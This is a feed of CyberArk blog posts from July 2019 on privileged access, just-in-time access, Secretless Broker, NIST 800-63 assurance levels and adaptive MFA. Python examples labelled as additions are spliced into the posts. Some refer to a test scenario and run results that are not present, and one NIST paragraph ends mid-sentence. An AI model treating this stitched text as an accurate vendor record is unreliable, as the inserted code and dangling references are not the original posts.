Zero Trust Series – 6 Protect, Detect, Deter, Respond is Not a Security Strategy.

Zero Trust Series – 7 Upping the Security Ante: How to Get Teams’ Buy-in for Zero Trust

Zero Trust Series – 8 Next-Gen Access and Zero Trust are the PB&J of Security

Zero Trust Series – 9 Passwords Need Fixing. Zero Trust is the Solution.

Zero Trust Series – 10 The One-Two Punch of Zero Trust. Verify Every User, Validate Every Device.

Zero Trust Series – 11 “Should I Stay or Should I Go?” Artificial Intelligence (And The Clash) has the Answer to Your Employee Access Dilemma.

Zero Trust Series – 12 Grow Up! Plotting Your Path Along the Zero Trust Maturity Model

Announcing the 2019 CyberArk Marketplace Community Integration Award Winner for Greatest Cybersecurity Impact https://www.cyberark.com/blog/announcing-the-2019-cyberark-marketplace-community-integration-award-winner-for-greatest-cybersecurity-impact/ Thu, 18 Jul 2019 15:15:32 +0000 https://www.cyberark.com/?p=70940

With more than 10,000 visitors per month, the CyberArk Marketplace is the premier destination for privileged access management-related technology integrations for organizations around the globe.

Last month, we introduced community contributions to the CyberArk Marketplace, enabling CyberArk partners and customers to submit and upload their own integrations with the CyberArk Privileged Access Security Solution. With the launch of this new feature came an open challenge: Submit an integration that makes a big impact and helps advance the community’s collective fight against cyber attackers.

Today on the main stage at CyberArk Impact Americas in Chicago, we were thrilled to announce our 2019 CyberArk Marketplace Impact Award winner: Integrity360, one of Ireland’s leading cybersecurity consultancies and a true MVP in the team game that is cybersecurity.

The Integrity360 privileged access team, led by security consultant Pranav Chugh, answered the call and surpassed our highest expectations by submitting not just one… but four innovative integrations for high-value systems! Available for download on the CyberArk Marketplace, these integrations include:

Brand new on the CyberArk Marketplace, the Integrity360 community integrations have already been downloaded many times! To honor their work and contributions, the Integrity360 team received the CyberArk Marketplace Impact award at CyberArk Impact in Chicago – the world’s largest gathering of privileged access management professionals. At CyberArk, we want to celebrate the willingness of Integrity360 and other members of our community to collaborate and share for all of our benefit.

The caliber of integrations submitted in this first month alone has been phenomenal and we’re so excited to see what valuable contributions the cybersecurity community has in store. If you haven’t submitted one yet, we encourage you to explore the CyberArk Marketplace and submit your integrations. Remember – when you contribute to the CyberArk Marketplace, everyone benefits from the ability to collaborate, exchange information and solve cybersecurity challenges faster and smarter together!

A huge thank you to all of the CyberArk Marketplace community integration contributors thus far, and congratulations to Integrity360 – the 2019 CyberArk Marketplace Impact Award winner!

Just-in-Time Access Just How You Want It https://www.cyberark.com/blog/just-in-time-access-just-how-you-want-it/ Thu, 18 Jul 2019 13:00:26 +0000 https://www.cyberark.com/?p=70919 Just-in-Time Access

Part one of this series discussed the backstory of just-in-time: its origins in Toyota manufacturing plants in the 1970s and how this methodology has made its way into cybersecurity in the form of just-in-time (JIT) privileged access. In this next entry, we’ll dive into how the CyberArk Privileged Access Security Solution has both built on existing functionality and evolved in order to address JIT.

To begin, there is always going to be a need to secure permanent accounts that require usernames and passwords, like service accounts, built-in admin accounts and domain controller credentials. Secure just-in-time access also requires recording and monitoring privileged activity and sessions. Without this capability, there is no way for an organization to ensure that even provisional access is being used as intended. CyberArk’s approach is that, even if a privileged account exists for only a few minutes, during those minutes it’s still vulnerable to compromise and, thus, still needs session audit for tracking and visibility.

At a high level, the important concepts for just-in-time are the ability to remove unnecessary standing access and to provide access only as needed. JIT access is granted by either routing an approval request to an administrator for validation or through a set of rule-based policies that define who can reasonably access what. This approvals process can also be automated leveraging APIs and through a variety of integrations, including IT Service Management (ITSM) solutions (available via the CyberArk Marketplace).

The underlying purpose of JIT is to provide the minimum level of privilege for the minimum amount of time with full session audit whenever possible. These concepts are at the core of how CyberArk looks at just-in-time access. Here is an overview of how CyberArk addresses JIT:

Broker and remove access. The CyberArk Privileged Access Security Solution enables the creation of policies that require users to provide a justification for connecting to a specific target for a defined time frame. Users must already have a standing, privileged shared account for which CyberArk manages the credentials. This is how many CyberArk customers have implemented JIT controls to date and it provides a primary route to implement JIT controls for customers who are looking to thoroughly safeguard their most critical assets.

Ephemeral accounts. Ephemeral accounts are one-time accounts created on the fly, which are immediately deprovisioned or deleted after use. When using ephemeral accounts, ensuring that sessions are recorded and audited is critical. CyberArk has two different ways to do this.

  1. Integration with AWS Security Token Service (STS). The STS integration enables AWS Identity and Access Management users to request temporary, limited privileged credentials. CyberArk integrates with STS to automatically generate role- or policy-based temporary sessions for the AWS Management Console or API level access, which can be recorded and monitored in real time.
  2. Integration with the Privileged Session Manager SSH Proxy and Active Directory (AD) Bridging, a feature of CyberArk Least Privilege Server Protection software. The CyberArk Privileged Session Manager SSH Proxy can grant dynamic access to Unix and Linux systems based on AD permissions. If access is approved based on AD permissions, the Privileged Session Manager SSH Proxy brokers an SSH connection to the target, creating a temporary account for the requesting user based on their username and establishing the session for that user. The account is removed after the session, once access is no longer valid.

Temporary Elevation. CyberArk has long supported the ability to elevate privileges to allow users access to privileged accounts or to run privileged commands. This quarter CyberArk is introducing new capabilities for JIT Elevation and Access with Endpoint Privilege Manager. This release provides customers with the ability to temporarily provide local admin access to Windows workstations, servers, and Macs on a by-request, timed basis and to remove access when time is up. JIT Elevation and Access with Endpoint Privilege Manager is an agent-based solution that provides a full audit trail for privileged activities with the ability to terminate applications and sessions in real time.

Additionally, since the release of Version 10.6 of the CyberArk Privileged Access Security Solution, CyberArk has provided an agentless alternative to JIT Elevation and Access. With this functionality, users can get Windows local admin access through the CyberArk web console for a set period of time.
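The mechanics behind the overview above, written here as an added example rather than CyberArk’s own code: a small just-in-time broker that holds no standing access, consults a rule-based policy first, falls back to a named approver when no rule matches, caps every grant at the policy’s maximum window, checks validity against the clock, deprovisions expired grants and writes every decision to an audit trail. The group names, targets, policy windows and the one-hour cap for manually approved grants are constructed for the illustration.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

# Constructed rule-based policy (hypothetical groups and targets): which group may be
# granted which target, and the longest window a single grant may cover.
POLICY = {
    ("linux-admins", "prod-db-01"): timedelta(minutes=30),
    ("linux-admins", "prod-web-01"): timedelta(minutes=30),
    ("dba", "prod-db-01"): timedelta(hours=2),
}
MANUAL_APPROVAL_CAP = timedelta(hours=1)  # constructed cap for approver-granted access


@dataclass
class Grant:
    user: str
    target: str
    justification: str
    approved_by: str        # "policy" for rule-based grants, otherwise the approving admin
    granted_at: datetime
    expires_at: datetime
    session_id: str


@dataclass
class JITBroker:
    """Minimal just-in-time access broker: no standing access, every grant is
    justified, time-boxed and recorded."""
    groups: dict                                  # user -> set of groups (constructed directory)
    grants: dict = field(default_factory=dict)    # session_id -> live Grant
    audit: list = field(default_factory=list)     # append-only decision log
    _counter: int = 0

    def _log(self, event, **details):
        self.audit.append({"event": event, **details})

    def request(self, user, target, justification, minutes, now, approver=None):
        """Return a Grant or raise PermissionError. Policy decides first; a request
        outside policy needs an explicit approver and gets the manual-approval cap."""
        if not justification.strip():
            self._log("denied", user=user, target=target, reason="no justification")
            raise PermissionError("justification required")
        windows = [POLICY[(g, target)] for g in self.groups.get(user, set()) if (g, target) in POLICY]
        if windows:
            cap, approved_by = max(windows), "policy"
        elif approver:
            cap, approved_by = MANUAL_APPROVAL_CAP, approver
        else:
            self._log("denied", user=user, target=target, reason="no policy match and no approver")
            raise PermissionError(f"{user} may not access {target} without approval")
        duration = min(timedelta(minutes=minutes), cap)   # never exceed the cap
        self._counter += 1
        grant = Grant(user, target, justification, approved_by, now, now + duration,
                      f"sess-{self._counter}")
        self.grants[grant.session_id] = grant
        self._log("granted", session=grant.session_id, user=user, target=target,
                  approved_by=approved_by, expires_at=grant.expires_at.isoformat())
        return grant

    def is_valid(self, session_id, now):
        """A session is valid only while its grant exists and its window is open."""
        g = self.grants.get(session_id)
        return g is not None and now < g.expires_at

    def revoke_expired(self, now):
        """Deprovision: drop every grant whose window has closed and record the removal."""
        expired = [sid for sid, g in self.grants.items() if now >= g.expires_at]
        for sid in expired:
            g = self.grants.pop(sid)
            self._log("revoked", session=sid, user=g.user, target=g.target, reason="expired")
        return expired
```

Note that the requested 120 minutes in the test scenario below is silently shortened to the policy’s 30-minute window; a broker should never let the requester choose a window longer than policy allows.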

Whether it’s standing or just-in-time access, organizations need a way to secure privileged accounts, credentials, and secrets. With CyberArk, customers can implement the approach that makes the most sense for their organization taking into account their security and operational requirements.

Introducing CyberArk Alero: Reduce Risk from Remote Vendors https://www.cyberark.com/blog/introducing-cyberark-alero-reduce-risk-from-remote-vendors/ Wed, 17 Jul 2019 15:00:48 +0000 https://www.cyberark.com/?p=70835

We are pleased to introduce CyberArk® Alero™. Alero is a new solution from CyberArk and we wanted to celebrate that with a fresh, new take on the blog. Instead of reading a long explanation, this time you get to sit back and enjoy a video. But, before you click play, there are a few things you might like to know about Alero.

Working with remote vendors can quickly become a major gap in your organization’s cybersecurity defenses. CyberArk Alero is a new software-as-a-service (SaaS)-based solution that works with the CyberArk Privileged Access Security Solution to mitigate risks associated with remote vendors accessing critical systems, while providing fast access to CyberArk for remote vendors. Alero brings the power of Zero Trust access, biometric authentication and just-in-time provisioning to bear on the problem.

Now, remote vendors don’t need to worry about VPNs, agents or passwords when obtaining privileged access to critical internal systems. All they need is an ordinary smart phone and CyberArk Alero. How does this work? Watch the video below to find out.


Learn more about how Alero secures access for remote vendors or download the Alero datasheet.

The Launch at Impact: Privileged Access Security Solution Version 11 https://www.cyberark.com/blog/the-launch-at-impact-privileged-access-security-version-11/ Wed, 17 Jul 2019 12:45:47 +0000 https://www.cyberark.com/?p=70746 Privileged Access Security v11

The 13th annual and largest ever CyberArk Impact Americas event officially kicked off in Chicago, bringing together customers, partners and a ton of cyber security experts to discuss all things privileged access management. One of the big announcements at Impact is the launch of the CyberArk Privileged Access Security Solution version 11. The latest version provides a geo-distributed architecture to support active/active Enterprise Password Vault topologies and simplifies the development of secure applications.

Let’s walk through some of the best features from this release in a bit more detail.

Geo-distribution and Support for Active/Active Enterprise Password Vaults

CyberArk is extending privileged access management to active/active architectures with multiple Enterprise Password Vaults. Customers have the ability to configure the CyberArk Privileged Access Security Solution to work in active/active topologies, providing transparent automatic failover and maintaining critical functions, such as password retrieval and session management, across geographically distributed vault configurations in the event of an outage. Moreover, this new architecture enables customers to work directly with their local vault, which automatically syncs with the master/primary vault (see Figure 1). This ensures increased performance and resiliency and removes dependencies between different geo-locations that previously relied on a single vault. Along with previously released support for multiple web consoles and active/active vault configurations for CyberArk Application Access Manager, we deliver the industry’s most robust solution for high availability and disaster recovery in the privileged access management category.


Figure 1. The new geo-distributed architecture provides active/active support for credential retrieval and session management services.

Simplified Development of Secure Applications for Kubernetes and Red Hat OpenShift Environments

Hard-coding credentials in applications continues to pose an ongoing security risk, one that is too often deprioritized by development teams wanting to rapidly deploy new applications. To increase developer adoption, CyberArk is adding an innovative new capability to Application Access Manager: Secretless Broker. Secretless Broker simplifies how applications in Kubernetes and Red Hat OpenShift environments securely access MySQL and PostgreSQL databases, HTTPS-based services and SSH.

With Secretless Broker, when an application needs to securely access a resource, the app simply makes a local connection request to Secretless Broker. Secretless Broker then automatically authenticates the app, fetches the required credentials from the vault and establishes a connection to the database or other resource. Like the CyberArk Privileged Session Manager, Secretless Broker isolates the application so that it no longer has to store the secret, much as an admin using Privileged Session Manager doesn’t need to know the password. This approach reduces the attack surface, since the application doesn’t have access to credentials, preventing the inadvertent leaking or exposure of privileged credentials.

The approach offers two major simplifications for developers. First it eliminates the need to write API calls to fetch an access credential or secret and, second, it eliminates the need for the application to directly handle secrets. Only CyberArk offers this type of capability and, going forward, CyberArk plans to support additional databases, web applications and other services with Secretless Broker.
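The request flow just described, written here as an added example of the pattern rather than CyberArk’s Secretless Broker itself: a broker listens on loopback, the application sends it a plain request with no credential, and the broker fetches a bearer token from a stand-in vault and injects it before forwarding to the protected service. The vault contents, the protected service, the token and the paths are all constructed for the demonstration, and the broker’s only check on its caller is that the request arrived over loopback, which stands in for the workload authentication a real broker performs.

```python
import http.client
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the vault: only the broker reads it, the application never does.
UPSTREAM_TOKEN_PATH = "apps/reporting/upstream-token"
VAULT = {UPSTREAM_TOKEN_PATH: "tok-constructed-example-value"}


class UpstreamHandler(BaseHTTPRequestHandler):
    """Constructed protected service: answers only to the bearer token held in the vault."""

    def do_GET(self):
        expected = f"Bearer {VAULT[UPSTREAM_TOKEN_PATH]}"
        if self.headers.get("Authorization") == expected:
            status, body = 200, b'{"status": "ok"}'
        else:
            status, body = 401, b'{"status": "unauthorized"}'
        self.send_response(status)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def make_broker_handler(upstream_port):
    """Local broker: authenticate the caller, fetch the credential, inject it, forward."""

    class BrokerHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            # 1. Authenticate the application. Here the only check is that the request
            #    came over loopback; a real broker verifies the workload's identity.
            if self.client_address[0] != "127.0.0.1":
                self.send_error(403, "broker is local-only")
                return
            # 2. Fetch the credential from the vault. It exists only inside the broker.
            token = VAULT[UPSTREAM_TOKEN_PATH]
            # 3. Forward the application's request with the credential injected.
            upstream = http.client.HTTPConnection("127.0.0.1", upstream_port, timeout=5)
            upstream.request("GET", self.path, headers={"Authorization": f"Bearer {token}"})
            resp = upstream.getresponse()
            body = resp.read()
            upstream.close()
            self.send_response(resp.status)
            self.send_header("Content-Type", resp.getheader("Content-Type", "application/json"))
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, *args):
            pass

    return BrokerHandler


def start_server(handler):
    """Bind to an ephemeral loopback port and serve from a background thread."""
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def app_request(port, path="/report"):
    """The application side: a plain local request that carries no credential at all."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", path)
    resp = conn.getresponse()
    result = resp.status, json.loads(resp.read())
    conn.close()
    return result


def demo():
    """Return (direct_status, via_broker_status): the credential-free app is refused
    when it talks to the service directly and accepted when it goes through the broker."""
    upstream = start_server(UpstreamHandler)
    broker = start_server(make_broker_handler(upstream.server_port))
    try:
        direct, _ = app_request(upstream.server_port)
        via_broker, _ = app_request(broker.server_port)
    finally:
        broker.shutdown(); broker.server_close()
        upstream.shutdown(); upstream.server_close()
    return direct, via_broker


if __name__ == "__main__":
    print(demo())  # (401, 200)
```

The point to notice is what the application code contains: no token, no vault call and no API to fetch a secret, only a local connection, which is the two simplifications the paragraph above describes. The same shape applies to the database case, where the broker speaks the database wire protocol and injects the password during the handshake instead of an HTTP header.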

Secretless Broker is offered as a fully supported feature of the Application Access Manager Dynamic Access Provider and is also available for CyberArk’s open source secrets management solution, Conjur. Register for the Application Access Manager Secretless Broker webinar, Security Win: Giving Developers the Access They Need Without the Hassle via Secretless Broker, at 1pm EST, 5 September.

Expanded Authentication Options Simplify Securing Applications

The latest release of Application Access Manager adds REST API support for OpenID Connect (OIDC) via the Dynamic Access Provider, along with existing support for AWS, Kubernetes/OpenShift, and LDAP authentication. With OIDC support, applications can natively and securely get secrets from Dynamic Access Provider to access other services and resources without needing to reauthenticate. This, alongside other expanded authentication options, makes it easier for customers to use Application Access Manager to secure their increasingly large application portfolios, which can include hundreds of commercial-off-the-shelf (COTS), cloud native and other applications.

Partner with the Number One Leader in Privileged Access Management

The release of version 11 continues to demonstrate CyberArk’s ability to deliver the most comprehensive privileged access management functionality for both human and non-human users in the market. We continue to innovate with our solution to enable our 4,600+ customers to defend against targeted attacks while delivering a simplified experience to security, operations, and end users.

 All of these features will be available to customers who upgrade to the CyberArk Privileged Access Security Solution version 11, which will be available this quarter.

NIST 800-63-B: Authentication and Lifecycle Management Guidelines https://www.cyberark.com/blog/nist-800-63-b-authentication-and-lifecycle-management-guidelines/ Tue, 16 Jul 2019 15:19:12 +0000 https://www.cyberark.com/?p=99104

Digital Authentication and Authentication Assurance Levels (AAL)

NIST defines authentication as a “process of determining the validity of one or more authenticators used to claim a digital identity.” In essence, authentication provides proof or assurance that an individual attempting to log in to a service or perform a transaction online does indeed possess and actively control a token or authenticator used to authenticate to the service. The confidence, or degree of assurance, with which we can definitively say that the individual is indeed in possession of the authenticator is referred to as the “Authentication Assurance Level” or AAL. The guidelines document defines three AALs:

Authenticator Assurance Level 1: AAL1 provides some assurance that the claimant controls an authenticator bound to the subscriber’s account. AAL1 requires either single-factor or multifactor authentication using a wide range of available authentication technologies. Successful authentication requires that the claimant prove possession and control of the authenticator through a secure authentication protocol.

Authenticator Assurance Level 2: AAL2 provides high confidence that the claimant controls authenticator(s) bound to the subscriber’s account. Proof of possession and control of two different authentication factors is required through secure authentication protocol(s). Approved cryptographic techniques are required at AAL2 and above.

Authenticator Assurance Level 3: AAL3 provides very high confidence that the claimant controls authenticator(s) bound to the subscriber’s account. Authentication at AAL3 is based on proof of possession of a key through a cryptographic protocol. AAL3 authentication requires a hardware-based authenticator and an authenticator that provides verifier impersonation resistance; the same device may fulfill both these requirements. In order to authenticate at AAL3, claimants are required to prove possession and control of two distinct authentication factors through secure authentication protocol(s). Approved cryptographic techniques are required.

A summary table of the requirements for the three AALs is shown below:

Figure: Summary table of requirements for AAL1, AAL2 and AAL3
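The three AAL descriptions above, and the biometric condition discussed later in this post, written as an added example of a policy check rather than anything from NIST or Idaptive: each authenticator is described by its factor type and a few properties, and a single function reports the highest level the combination satisfies together with the reasons it stops there. The authenticator catalogue is constructed; modelling “approved cryptographic techniques” as a per-authenticator flag is a simplification, since NIST applies it to the authentication protocol as a whole.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Authenticator:
    name: str
    factor: str               # "knowledge", "possession" or "inherence"
    approved_crypto: bool     # uses approved cryptographic techniques (simplified per device)
    hardware: bool            # hardware-based authenticator
    vir: bool                 # provides verifier impersonation resistance
    restricted: bool = False  # a NIST "restricted" authenticator, such as SMS OTP


def assurance_level(auths):
    """Return (AAL, notes) for a set of authenticators presented together, following the
    AAL1/AAL2/AAL3 conditions above. Level 0 means nothing was presented."""
    notes = []
    auths = list(auths)
    if not auths:
        return 0, ["no authenticator presented"]
    for a in auths:
        if a.restricted:
            notes.append(f"{a.name} is a restricted authenticator")
    factors = {a.factor for a in auths}
    # Biometrics count only as part of MFA together with a physical authenticator.
    if "inherence" in factors and "possession" not in factors:
        factors.discard("inherence")
        notes.append("biometric without a physical authenticator does not count as a factor")
    if len(factors) < 2:
        return 1, notes                      # AAL1: single factor is enough
    if not all(a.approved_crypto for a in auths):
        notes.append("AAL2 and above require approved cryptographic techniques")
        return 1, notes
    # AAL3: a hardware-based authenticator and a verifier-impersonation-resistant one;
    # the same device may satisfy both requirements.
    if any(a.hardware for a in auths) and any(a.vir for a in auths):
        return 3, notes
    notes.append("AAL3 needs a hardware-based and a verifier-impersonation-resistant authenticator")
    return 2, notes


# Constructed catalogue of authenticator types used in the checks.
PASSWORD = Authenticator("memorized secret", "knowledge", True, False, False)
SMS_OTP = Authenticator("SMS OTP", "possession", True, False, False, restricted=True)
TOTP_APP = Authenticator("software OTP app", "possession", True, False, False)
SECURITY_KEY = Authenticator("hardware cryptographic key", "possession", True, True, True)
FINGERPRINT = Authenticator("fingerprint on device", "inherence", True, False, False)
```

Run against the catalogue, a password alone stops at AAL1, password plus software OTP reaches AAL2, password plus SMS OTP also evaluates to AAL2 but carries the restricted-authenticator note, a password plus a fingerprint with no possession factor falls back to AAL1, and a hardware key with a fingerprint reaches AAL3.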

Address the three AALs with Idaptive Adaptive Multi-factor Authentication

Idaptive has been consistently ranked as one of the top cloud-based multi-factor authentication solutions, both by customers and by leading analysts like KuppingerCole and Gartner. Idaptive not only has the broadest choice of authentication factors but is also the most versatile in supporting MFA Everywhere: the ability to deploy multi-factor authentication to all possible use cases, whether for VPNs (like Palo Alto Networks), Windows PCs or Amazon WorkSpaces virtual desktops.

Mapping Authenticators to Idaptive Authentication Mechanisms

Below are some examples of how Idaptive’s supported authentication mechanisms map to the authenticators defined by NIST. Note that this is by no means exhaustive in terms of all the authenticators supported by Idaptive.

Figure: Mapping of NIST authenticator types to Idaptive authentication mechanisms

SMS OTP as a Second Factor? No!

Although SMS OTP is one of Idaptive’s most commonly used second factors, NIST strongly discourages its use and considers it a “Restricted Authenticator”. According to NIST, authenticators that leverage the public switched telephone network (read: telecom carriers).

Biometrics as an Authenticator

The guidelines also cover biometric authenticators, commonly referred to as “something you are”, which take the form of an electronic representation of an individual’s unique physical features (fingerprint, iris scan, heartbeat) or unique behavioral characteristics (e.g. typing cadence). The 800-63-B guidelines allow only very limited use of biometrics as an authenticator. This is because the False Match Rate (FMR), also called the False Accept Rate (FAR), and the False Non-Match Rate (FNMR), also called the False Reject Rate (FRR), associated with biometrics do not provide the right level of confidence during authentication. Biometric comparison is also probabilistic rather than deterministic, whereas determinism is an important property of all the other approved authenticators. Biometric features are also not secrets, since they can often be obtained by taking a picture of someone, high-resolution if needed (facial recognition, iris scan), or lifted from objects someone touches (fingerprints). There are ways of mitigating these weaknesses, such as proprietary feature-to-template conversion algorithms, but that requires additional trust in those algorithms. Hence, according to NIST, biometrics should only be used as part of MFA together with a physical authenticator (something you have). Also, the FMR of the biometric system should be 1 in 1000 or better. There are further conditions under which biometrics can be used, explained in more detail in the guidelines document itself. In line with NIST guidelines, Idaptive supports biometric authentication such as facial or fingerprint recognition on mobile devices as a second or even a third factor for authentication into systems.

Risk-based or Adaptive Authentication Systems and NIST

Risk-based or adaptive authentication systems often leverage contextual information such as device context, user context, location context and network context to compute a risk score that can then be used to determine if and how (with what factors) a user needs to reauthenticate to a system. Adaptive authentication systems are great at improving the end-user experience of MFA, while also ensuring that an authentication decision is augmented by a more in-depth analysis (often driven by machine learning) of the user’s behavior. While these solutions are not considered a valid authenticator by NIST on their own (since they can’t be called a “secret”), they are becoming table stakes as we move towards a Zero Trust world. Idaptive is the only leading IDaaS vendor that has its own User Behavior Analytics solution completely integrated with its MFA portfolio, giving us the ability to augment MFA with risk-based access.

I could go on and explore this guideline even further, given that this topic (authentication and authorization) is particularly close to my heart. But I’ll end this conversation here; if you’re interested in finding out more about how Idaptive helps address these guidelines, reach out to us or sign up for our free trial here.

NIST Series Part 1

NIST Series Part 2

NIST Series Part 3

NIST Series Part 4

Getting Over MFA Implementation Hesitation https://www.cyberark.com/blog/getting-over-mfa-implementation-hesitation/ Mon, 15 Jul 2019 17:33:47 +0000 https://www.cyberark.com/?p=99368

We talk a lot about how multi-factor authentication (MFA) is a vital tool in a Zero Trust approach, the most promising strategy to keep an organization safe from breaches.  We may even take it for granted that our audiences know exactly what we’re talking about with MFA and why it is so important. In the industry analysis section of the recent 2019 Verizon Data Breach Investigation Report, MFA was recommended as a “thing to consider” to four different industries, including finance and insurance. It is surprising that in 2019 this seemingly standard tool for security should even have to be recommended to industries. What is behind any hesitation to implement MFA, and how can enterprises overcome this reluctance?

Anyone who travels can relate to the desire to arrive at the airport, pass quickly through security, settle into your seat, and take off into the air in, say, 15 minutes. But the reality is all travelers must go through security checks, and this can take time. And while travelers do indeed complain about TSA regularly, no one wants to have an incident once on board. There is always a fine balance between user experience in accessing something and also delivering security.

We hear from analysts and customers that MFA and delivering a solid user experience are at odds with each other. Traditionally, as security moved towards the implementation of strong authentication, it could compromise user experience. Enterprises naturally don’t want to frustrate their users or encourage them to create work-arounds. A B2C company might wonder, “will MFA reduce traffic to the website?” These are legitimate concerns.

With an adaptive MFA solution like CyberArk Idaptive’s, security is strengthened with context- and behavior-based access controls for all applications. Analytics and machine learning are leveraged to detect abnormal and risky user behavior, prompting an MFA challenge or blocking access in real time. When a user signs in from her usual device, into her typical apps, in her typical geolocation, she won’t be prompted with MFA. Think of it as having ‘TSA Pre-Check’ on her airline ticket: it speeds up her airport security process while her actions are continuously monitored (behavioral analytics), so that she can be asked to undergo security screening if any anomaly is detected. This delivers a good user experience without compromising security.
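The risk scoring that this paragraph and the NIST 800-63-B post above both describe, written here as an added example that is not Idaptive’s engine: fixed, constructed weights stand in for the learned model, a per-user baseline of usual devices, countries, apps, networks and hours is compared with each sign-in, a run of recent failed attempts adds to the score, and the total maps to allow, step-up MFA or block. The thresholds, weights, signal names and the sample baseline are all constructed for the illustration.

```python
from dataclasses import dataclass

STEP_UP = 40   # score at or above this: challenge with a second factor
BLOCK = 80     # score at or above this: deny access and alert

# Constructed weights for the contextual signals the text lists: device, user/app,
# location and network context. A real system would learn these per user.
WEIGHTS = {
    "unknown device": 40,
    "unusual country": 35,
    "unknown network": 15,
    "app outside usual set": 10,
    "outside usual hours": 10,
}
FAILURE_WEIGHT = 15     # per recent failed attempt
FAILURE_CAP = 45        # so a burst of failures alone triggers MFA, not a block


@dataclass
class Baseline:
    """What is usual for one user, as learned from prior successful sign-ins (constructed)."""
    devices: frozenset
    countries: frozenset
    apps: frozenset
    networks: frozenset
    hours: range = range(7, 20)   # local working hours


@dataclass
class SignIn:
    """One authentication attempt with its context (constructed fields)."""
    device: str
    country: str
    app: str
    network: str
    hour: int
    recent_failures: int = 0


def risk_score(baseline, event):
    """Sum the weights of every signal that deviates from the baseline, capped at 100.
    Returns (score, reasons) so the decision can be explained in the audit trail."""
    reasons = []
    if event.device not in baseline.devices:
        reasons.append("unknown device")
    if event.country not in baseline.countries:
        reasons.append("unusual country")
    if event.network not in baseline.networks:
        reasons.append("unknown network")
    if event.app not in baseline.apps:
        reasons.append("app outside usual set")
    if event.hour not in baseline.hours:
        reasons.append("outside usual hours")
    score = sum(WEIGHTS[r] for r in reasons)
    if event.recent_failures:
        score += min(FAILURE_WEIGHT * event.recent_failures, FAILURE_CAP)
        reasons.append(f"{event.recent_failures} recent failed attempts")
    return min(score, 100), reasons


def decide(baseline, event):
    """Map the score to an action: the familiar context passes without a prompt,
    a moderate deviation steps up to MFA, a large one is blocked."""
    score, reasons = risk_score(baseline, event)
    if score >= BLOCK:
        action = "block"
    elif score >= STEP_UP:
        action = "mfa"
    else:
        action = "allow"
    return action, score, reasons


# Constructed baseline for a sample user.
ALICE = Baseline(devices=frozenset({"laptop-a1"}), countries=frozenset({"US"}),
                 apps=frozenset({"mail", "crm"}), networks=frozenset({"corp-egress"}))
```

The usual device, country, app, network and hour produce a score of zero and pass straight through, which is the “TSA Pre-Check” case above; a new device alone is enough to step up to MFA; a new device from an unusual country on an unknown network in the middle of the night is blocked outright. Returning the reasons alongside the score matters for operations: a step-up or block that cannot be explained to the user or the SOC gets tuned out.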

Another reason behind any hesitation for MFA could be the perceived cost of managing those second factors. A decade ago, smartphones were just starting to mature. For authentication, people still used smart cards, USB keys plugged into devices, and SMS as one-time passwords. There were immense costs associated with managing many of these and their life cycles. For example, vendors like AT&T would charge for every SMS sent out. Even a rechargeable smart card would cost $50. Deploying measures like this to an entire organization would quickly rack up the expenses.

All of this changed in the last decade. Today, smartphones are ubiquitous — everyone has them. Bring your own device (BYOD) is very common, which means most individuals carry and manage their own phones for the organization. As a result, the cost of operating many second factors for multi-factor authentication has gone down, while also offering new possibilities for authentication methods such as authenticators for new standards such as WebAuthn/FIDO2.

Our adaptive MFA includes a comprehensive range of authentication methods, including passwords, smart cards, soft tokens, or cryptographic devices. It’s not enough to protect your organization — the experience for employees should be frictionless. Whether it’s a push notification, Integrated Windows Authentication, Idaptive mobile authenticator, SMS/text message, email, interactive phone call, YubiKeys, USB devices, digital certificates, enabling FIDO U2F, smart cards, or derived credentials or biometrics, we’ve got an authentication method for everyone, even the most hesitant of organizations.

We won’t go so far as to invoke that old saying, “you snooze, you lose,” but hesitating to put an adaptive MFA solution to work protecting your employees and extended business could have an impact similar to a hijacker getting through security because there was no TSA agent.

]]>
NIST 800-63-A: Enrollment and Identity Proofing https://www.cyberark.com/blog/nist-800-63-a-enrollment-and-identity-proofing/ Tue, 09 Jul 2019 15:10:15 +0000 https://www.cyberark.com/?p=99070

A digital identity, as we discussed in our earlier blog, is a unique representation of the real-world individual in an online world, as the individual participates in an online transaction. In many cases, a service or a Relying Party (RP) does not necessarily need to map that digital identity to the real-world identity of the individual, especially in cases where there is a genuine need to ensure the complete protection of the individual’s privacy and even anonymity. But in other cases, for reasons that could range from regulatory (e.g. Know Your Customer) and security (fake accounts in social media, DeepFake) to others, there may be a need to ensure that the digital identity is mapped to and validated against a unique real-world individual. This process of mapping and validation is called enrollment and identity proofing.

Figure: The Identity Proofing User Journey, Source: NIST Special Publication 800-63A

Identity Assurance Levels

The “strength of the assurance” with which this digital identity is mapped to and validated against a unique real-world individual is referred to in the NIST guidelines as the Level of Assurance. NIST defines three levels of assurance (LOA) for the identity proofing process — 1, 2 and 3 — in increasing order of strength.

Identity Assurance Level 1 (IAL1)

NIST provides the following description for IAL1: “There is no requirement to link the applicant to a specific real-life identity. Any attributes provided in conjunction with the subject’s activities are self-asserted or should be treated as self-asserted (including attributes a CSP asserts to an RP). Self-asserted attributes are neither validated nor verified.”

In other words, IAL1 does not require any verification of claims and attributes that the user provides to the credential service provider.

Identity Assurance Level 2 (IAL2)

For IAL2, NIST provides the following description: “Evidence supports the real-world existence of the claimed identity and verifies that the applicant is appropriately associated with this real-world identity. IAL2 introduces the need for either remote or physically-present identity proofing. Attributes could be asserted by CSPs to RPs in support of pseudonymous identity with verified attributes. A CSP that supports IAL2 can support IAL1 transactions if the user consents.”

IAL2 allows for remote or in-person identity proofing. Examples of this proofing include services that ask an individual to prove possession of an identity document, such as a Driver’s License or a Passport. As part of this, collection of personally identifiable information (PII) should be kept to a minimum – only what is needed to resolve the user’s identity in the context of the service that requires it. Also, the credential service provider may collect biometrics for the purposes of non-repudiation and re-proofing.

Identity Assurance Level 3 (IAL3)

